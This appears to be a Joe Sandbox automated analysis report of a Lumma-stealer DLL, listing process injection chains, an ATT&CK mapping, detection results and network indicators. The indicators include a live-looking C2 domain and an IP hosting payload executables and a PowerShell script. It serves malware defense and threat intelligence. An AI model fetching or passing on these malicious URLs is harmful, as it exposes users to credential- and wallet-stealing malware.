            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: number of queries: 2002
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4132, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            MITRE ATT&CK Matrix (counts in parentheses are the number of matching signatures per technique; cells without a count are unpopulated placeholders of the matrix):

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping (2) | File and Directory Discovery (21) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | Process Injection (311) | Deobfuscate/Decode Files or Information (11) | LSASS Memory | System Information Discovery (22) | Remote Desktop Protocol | Data from Local System (41) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (31) | Security Account Manager | Security Software Discovery (121) | SMB/Windows Admin Shares | Clipboard Data (2) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | PowerShell (1) | Login Hook | Login Hook | DLL Side-Loading (1) | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (124) | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Masquerading (1) | LSA Secrets | Virtualization/Sandbox Evasion (151) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (151) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Process Injection (311) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Regsvr32 (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Rundll32 (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1580147 | Sample: iviewers.dll | Startdate: 24/12/2024 | Architecture: WINDOWS | Score: 100

            Start node
              DNS/IP: volcanoyev.click
              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
              loaddll32.exe (started)
                regsvr32.exe (started)
                  Dropped: C:\Users\user\AppData\...\snjgawjs.cmdline, Unicode
                  powershell.exe (started)
                    DNS/IP: 147.45.44.131, ports 49706, 49707, 49708, FREE-NET-ASFREEnetEU, Russian Federation
                    Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Writes to foreign memory regions; Suspicious execution chain found; 2 other signatures
                    csc.exe (started)
                      Dropped: C:\Users\user\AppData\Local\...\ljtzeyvh.dll, PE32
                      cvtres.exe (started)
                    3 other processes
                      DNS/IP: volcanoyev.click 172.67.195.241, ports 443, 49709, 49710, CLOUDFLARENETUS, United States
                  csc.exe (started)
                    Dropped: C:\Users\user\AppData\Local\...\snjgawjs.dll, PE32
                    2 other processes
                powershell.exe (started)
                  Dropped: C:\Users\user\AppData\Local\...\rcv5n2si.0.cs, Unicode
                  Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                  RegAsm.exe (started)
                    Signatures: Query firmware table information (likely to detect VMs); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
                  csc.exe (started)
                    Dropped: C:\Users\user\AppData\Local\...\rcv5n2si.dll, PE32
                    cvtres.exe (started)
                  3 other processes
                cmd.exe (started)
                  rundll32.exe (started)
                    powershell.exe (started)
                      Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                      RegAsm.exe (started)
                        Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Tries to steal Crypto Currency Wallets
                      csc.exe (started)
                        Dropped: C:\Users\user\AppData\Local\...\pejlabp5.dll, PE32
                        cvtres.exe (started)
                      conhost.exe (started)
                    csc.exe (started)
                      Dropped: C:\Users\user\AppData\Local\...\shgzzqqc.dll, PE32
                      conhost.exe (started)
                      cvtres.exe (started)
                3 other processes
                  Dropped: C:\Users\user\AppData\Local\...\ceo01y5g.dll, PE32
                  powershell.exe (started)
                    Signatures: Injects a PE file into a foreign processes
                    csc.exe (started)
                      Dropped: C:\Users\user\AppData\Local\...\tkky4heb.dll, PE32
                      cvtres.exe (started)
                    2 other processes
                  csc.exe (started)
                    Dropped: C:\Users\user\AppData\Local\...\zhytdsxg.dll, PE32
                    2 other processes
                  cvtres.exe (started)

            Source | Detection | Scanner | Label | Link
            iviewers.dll | 39% | Virustotal | | Browse
            iviewers.dll | 37% | ReversingLabs | Win32.Spyware.Lummastealer |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll | 100% | Avira | HEUR/AGEN.1300034 |
            C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll | 100% | Avira | HEUR/AGEN.1300034 |
            C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll | 100% | Avira | HEUR/AGEN.1300034 |
            C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://volcanoyev.click/api9 | 100% | Avira URL Cloud | malware |
            http://147.45.44.131 | 0% | Avira URL Cloud | safe |
            https://volcanoyev.click/api | 100% | Avira URL Cloud | malware |
            http://147.45.44.131/infopage/inbg.exe | 0% | Avira URL Cloud | safe |
            http://crl.micro:b | 0% | Avira URL Cloud | safe |
            https://volcanoyev.click/ | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/D | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/4 | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/L | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click:443/apiohrz.default-release/key4.dbPK | 100% | Avira URL Cloud | malware |
            http://147.45.448 | 0% | Avira URL Cloud | safe |
            https://volcanoyev.click/e | 100% | Avira URL Cloud | malware |
            http://147.45.44.131/infopage/ybfh.ps1U | 0% | Avira URL Cloud | safe |
            volcanoyev.click | 100% | Avira URL Cloud | malware |
            http://147.45.44.131/infopage/oung.exe | 0% | Avira URL Cloud | safe |
            https://volcanoyev.click:443/api | 100% | Avira URL Cloud | malware |
            http://crl.micro? | 0% | Avira URL Cloud | safe |
            http://147.45.44.131/infopage/ybfh.ps1 | 0% | Avira URL Cloud | safe |
            https://volcanoyev.click/apiSa | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/apin | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/apiU | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/k? | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/Y | 100% | Avira URL Cloud | malware |
            https://volcanoyev.click/W | 100% | Avira URL Cloud | malware |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            volcanoyev.click | 172.67.195.241 | true | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            necklacebudi.lat | false | | high
            aspecteirs.lat | false | | high
            energyaffai.lat | false | | high
            https://volcanoyev.click/api | true | Avira URL Cloud: malware | unknown
            volcanoyev.click | true | Avira URL Cloud: malware | unknown
            sustainskelet.lat | false | | high
            http://147.45.44.131/infopage/ybfh.ps1 | true | Avira URL Cloud: safe | unknown
            crosshuaht.lat | false | | high
            rapeflowwj.lat | false | | high
            grannyejh.lat | false | | high
            discokeyus.lat | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nuget.org/NuGet.exe | powershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://volcanoyev.click/D | RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            http://crl.microsoft | powershell.exe, 0000000F.00000002.1629065195.0000000006D95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1579325198.00000000079BD000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://go.micro | powershell.exe, 0000000F.00000002.1605796075.0000000004E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://147.45.44.131/infopage/inbg.exe | powershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://contoso.com/License | powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/Icon | powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://volcanoyev.click/L | RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://volcanoyev.click/api9 | RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://volcanoyev.click/ | RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010F7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://volcanoyev.click/4 | RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://volcanoyev.click:443/apiohrz.default-release/key4.dbPK | RegAsm.exe, 00000023.00000002.1754899784.000000000117D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://github.com/Pester/Pester | powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmp | false | |
                                              high
                                              http://crl.micro:bpowershell.exe, 00000014.00000002.1578974277.0000000007929000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://147.45.44.131powershell.exe, 0000000D.00000002.1589335298.00000000054D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000570B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004B94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://147.45.448powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005E1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://volcanoyev.click/apinRegAsm.exe, 00000023.00000002.1754899784.0000000001157000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://147.45.44.131/infopage/ybfh.ps1Upowershell.exe, 0000000F.00000002.1628755602.0000000006D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://volcanoyev.click/eRegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://crl.micropowershell.exe, 0000001B.00000002.1670598769.0000000006FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://volcanoyev.click:443/apiRegAsm.exe, RegAsm.exe, 00000029.00000002.1807822091.0000000001107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://147.45.44.131/infopage/oung.exepowershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://volcanoyev.click/apiSaRegAsm.exe, 00000023.00000002.1754899784.00000000011C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://crl.micro?powershell.exe, 0000000F.00000002.1601052768.0000000000808000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://volcanoyev.click/apiURegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://volcanoyev.click/k?RegAsm.exe, 00000020.00000002.1591162034.0000000000ADB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://volcanoyev.click/WRegAsm.exe, 00000020.00000002.1590077351.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameloaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://volcanoyev.click/YRegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
IP             | Domain           | Country            | ASN   | ASN Name             | Malicious
172.67.195.241 | volcanoyev.click | United States      | 13335 | CLOUDFLARENETUS      | true
147.45.44.131  | unknown          | Russian Federation | 2895  | FREE-NET-ASFREEnetEU | true
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1580147
                                                        Start date and time:2024-12-24 02:17:08 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 34s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:44
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:iviewers.dll
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winDLL@71/60@1/2
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 71
                                                        • Number of non-executed functions: 69
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .dll
                                                        • Stop behavior analysis, all processes terminated
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegAsm.exe, PID 4132 because there are no executed functions
• Execution Graph export aborted for target RegAsm.exe, PID 4352 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time     | Type            | Description
20:18:11 | API Interceptor | 142x Sleep call for process: powershell.exe modified
20:18:20 | API Interceptor | 17x Sleep call for process: RegAsm.exe modified
Match          | Associated Sample Name / URL | Detection | Threat Name                                       | Context
172.67.195.241 | Voice_Message.html           | malicious | HTMLPhisher                                       |
147.45.44.131  | Captcha.hta                  | malicious | LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer | 147.45.44.131/infopage/bnkh.exe
147.45.44.131  | htZgRRla8S.exe               | malicious | LummaC Stealer                                    | 147.45.44.131/infopage/ung0.exe
147.45.44.131  | Captcha.hta                  | malicious | LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer | 147.45.44.131/infopage/ilk.exe
147.45.44.131  | Captcha.hta                  | malicious | HTMLPhisher                                       | 147.45.44.131/infopage/bgfi.ps1
147.45.44.131  | Captcha.hta                  | malicious | Cobalt Strike, HTMLPhisher, LummaC Stealer        | 147.45.44.131/infopage/ung0.exe
147.45.44.131  | EBUdultKh7.exe               | malicious | LummaC Stealer                                    | 147.45.44.131/infopage/vsom.exe
147.45.44.131  | MiJZ3z4t5K.exe               | malicious | Unknown                                           | 147.45.44.131/infopage/Tom.exe
147.45.44.131  | ZjH6H6xqo7.exe               | malicious | LummaC                                            | 147.45.44.131/infopage/tvh53.exe
147.45.44.131  | nlJ2sNaZVi.exe               | malicious | LummaC                                            | 147.45.44.131/infopage/tbh75.exe
147.45.44.131  | TZ33WZy6QL.exe               | malicious | LummaC                                            | 147.45.44.131/infopage/tbg9.exe
                                                          No context
Match                | Associated Sample Name / URL | Detection | Threat Name                  | Context
CLOUDFLARENETUS      | Loader.exe                   | malicious | LummaC                       | 172.67.145.201
CLOUDFLARENETUS      | Collapse.exe                 | malicious | LummaC                       | 172.67.199.72
CLOUDFLARENETUS      | Setup.exe                    | malicious | LummaC Stealer               | 104.21.48.1
CLOUDFLARENETUS      | AxoPac.exe                   | malicious | LummaC                       | 172.67.184.241
CLOUDFLARENETUS      | Setup.exe                    | malicious | LummaC                       | 172.67.169.205
CLOUDFLARENETUS      | Setup.exe                    | malicious | LummaC                       | 188.114.96.6
CLOUDFLARENETUS      | Setup.exe                    | malicious | LummaC                       | 188.114.96.6
CLOUDFLARENETUS      | 'Set-up.exe                  | malicious | LummaC                       | 172.67.169.205
CLOUDFLARENETUS      | setup.exe                    | malicious | LummaC                       | 172.67.191.144
CLOUDFLARENETUS      | Setup.exe                    | malicious | LummaC                       | 104.21.27.229
FREE-NET-ASFREEnetEU | Collapse.exe                 | malicious | LummaC                       | 147.45.47.81
FREE-NET-ASFREEnetEU | nTyPEbq9wQ.lnk               | malicious | Unknown                      | 147.45.49.155
FREE-NET-ASFREEnetEU | 7A2lfjTYNf.lnk               | malicious | Unknown                      | 147.45.49.155
FREE-NET-ASFREEnetEU | 6fW0guYpsH.lnk               | malicious | Unknown                      | 147.45.49.155
FREE-NET-ASFREEnetEU | FzmtNV0vnG.lnk               | malicious | Unknown                      | 147.45.49.155
FREE-NET-ASFREEnetEU | lKin1m7Pf2.lnk               | malicious | Unknown                      | 147.45.49.155
FREE-NET-ASFREEnetEU | jqplot.hta                   | malicious | Unknown                      | 147.45.112.248
FREE-NET-ASFREEnetEU | KNkr78hyig.exe               | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
FREE-NET-ASFREEnetEU | Tsy9P2T9yF.exe               | malicious | Unknown                      | 147.45.113.159
FREE-NET-ASFREEnetEU | kGxQbLOG7s.exe               | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
Match                            | Associated Sample Name / URL | Detection | Threat Name    | Context
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe                   | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | Collapse.exe                 | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe                    | malicious | LummaC Stealer | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | AxoPac.exe                   | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe                    | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe                    | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe                    | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | 'Set-up.exe                  | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | setup.exe                    | malicious | LummaC         | 172.67.195.241
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe                    | malicious | LummaC         | 172.67.195.241
                                                          No context
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.361827289088002
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCq1KDLI4M9tDLI4MWuPTAv:MLUE4Kx1qE4qpE4KO
                                                          MD5:44B4D94ACD354843DF96E9CCF8E41D29
                                                          SHA1:BC5FDBADA2053E785B6C87244E4C545F70C282CE
                                                          SHA-256:E8F78742901691AC4C6473A754BEA72FEF8E723030E46F8B912C14AC1B222C99
                                                          SHA-512:5E7A345EFFC080091CCA25B6668ECECF998B6D8E0CEDE86B58B6066A869F09AB62FDB89F704FADC97BC1EB0EE4509D94250AD0FA3350FC9F0CEBA3AB69D1D805
                                                          Malicious:false
